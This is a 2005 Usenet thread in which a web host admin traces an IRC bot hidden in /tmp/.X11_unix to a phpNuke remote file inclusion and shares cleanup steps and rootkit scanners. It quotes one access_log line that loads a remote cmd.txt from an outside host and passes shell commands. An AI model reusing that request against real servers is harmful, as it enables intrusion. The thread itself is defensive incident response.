Hi

a customer is running an IRC program. i am having problems finding who as
the files install under /tmp/.X11_unix/.unix with UID/GID apache

This is on FC3

Google does not bring up much and apart from firewalling ports 666x to 6669
and killing the daemon. any pointers welcomed.

Mark

[ Post a follow-up to this message ]

Mark D Smith wrote:
> Hi
>
> a customer is running an IRC program. i am having problems finding who as
> the files install under /tmp/.X11_unix/.unix with UID/GID apache
>
> This is on FC3
>
> Google does not bring up much and apart from firewalling ports 666x to 666
9
> and killing the daemon. any pointers welcomed.
>
> Mark
>


...if it's a customer, grep /var/html/www  or /home/*/public_html for
'irc' and see what it brings up.  You can use lsof to see what's opening
those files, or use ps to keep an eye on what processes are active.

...if it's *not* a customer...   Doh!

[ Post a follow-up to this message ]

"Jake" <NoSpamForMe@here.tld> wrote in message
news:5rWTe.15065$I02.892219@news20.bellglobal.com...
> Mark D Smith wrote: 
as[vbcol=seagreen] 
6669[vbcol=seagreen] 
>
>
> ...if it's a customer, grep /var/html/www  or /home/*/public_html for
> 'irc' and see what it brings up.  You can use lsof to see what's opening
> those files, or use ps to keep an eye on what processes are active.
>
> ...if it's *not* a customer...   Doh!
>
>
It looks like another issue with phpnuke. found this in an access_log of a
customer

/home/domain/domain110/logs/access_log:200.32.121.22 - -
[03/Sep/2005:08:44:34 +0100] "GET
/phpnuke/gallery/displayCategory.php?adminpath=http://clientes.netvisao.pt/j
mascare/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" 200 487 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"

along with a host of other refs to .X11_unix

needless to say with disabled the customers phpnuke and informed them to
contact the authors for a patch or newer version.

Mark

[ Post a follow-up to this message ]

Mark D Smith wrote:
> "Jake" <NoSpamForMe@here.tld> wrote in message
> news:5rWTe.15065$I02.892219@news20.bellglobal.com...
> 
>
> as
> 
>
> 6669
> 
>
> It looks like another issue with phpnuke. found this in an access_log of a
> customer
>
> /home/domain/domain110/logs/access_log:200.32.121.22 - -
> [03/Sep/2005:08:44:34 +0100] "GET
> /phpnuke/gallery/displayCategory.php?adminpath=http://clientes.netvisao.pt
/j
> mascare/cmd.txt?&cmd=cd%20/tmp/.X11_unix;ls%20-a HTTP/1.0" 200 487 "-"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
>
> along with a host of other refs to .X11_unix
>
> needless to say with disabled the customers phpnuke and informed them to
> contact the authors for a patch or newer version.
>
> Mark
>

That'll do it.  Mind if I ask how you discovered the intrusion?

[ Post a follow-up to this message ]

"Jake" <NoSpamForMe@here.tld> wrote in message
news:wNZTe.16121$I02.925006@news20.bellglobal.com...
<snip>
> That'll do it.  Mind if I ask how you discovered the intrusion?

routine check of /tmp dir for hidden files found .X11_unix dir which i did
not know what it was. looked at the files and found the dreaded irc
mentioned google found nothing of much help.

used ps and netstat to find what was running, killed and removed the files.

post checked with rkhunter and all looks clean.

Mark

[ Post a follow-up to this message ]

Mark D Smith wrote:
> "Jake" <NoSpamForMe@here.tld> wrote in message
> news:wNZTe.16121$I02.925006@news20.bellglobal.com...
> <snip>
> 
>
>
> routine check of /tmp dir for hidden files found .X11_unix dir which i did
> not know what it was. looked at the files and found the dreaded irc
> mentioned google found nothing of much help.
>
> used ps and netstat to find what was running, killed and removed the files
.
>
> post checked with rkhunter and all looks clean.
>
> Mark
>

rkhunter is a great tool.  I use it in conjunction with chkrootkit and
tripwire.  Makes for a lot of logs every morning but at least I know
what's going on.  Most of the time anyway, nothing's ever 100%. :\

[ Post a follow-up to this message ]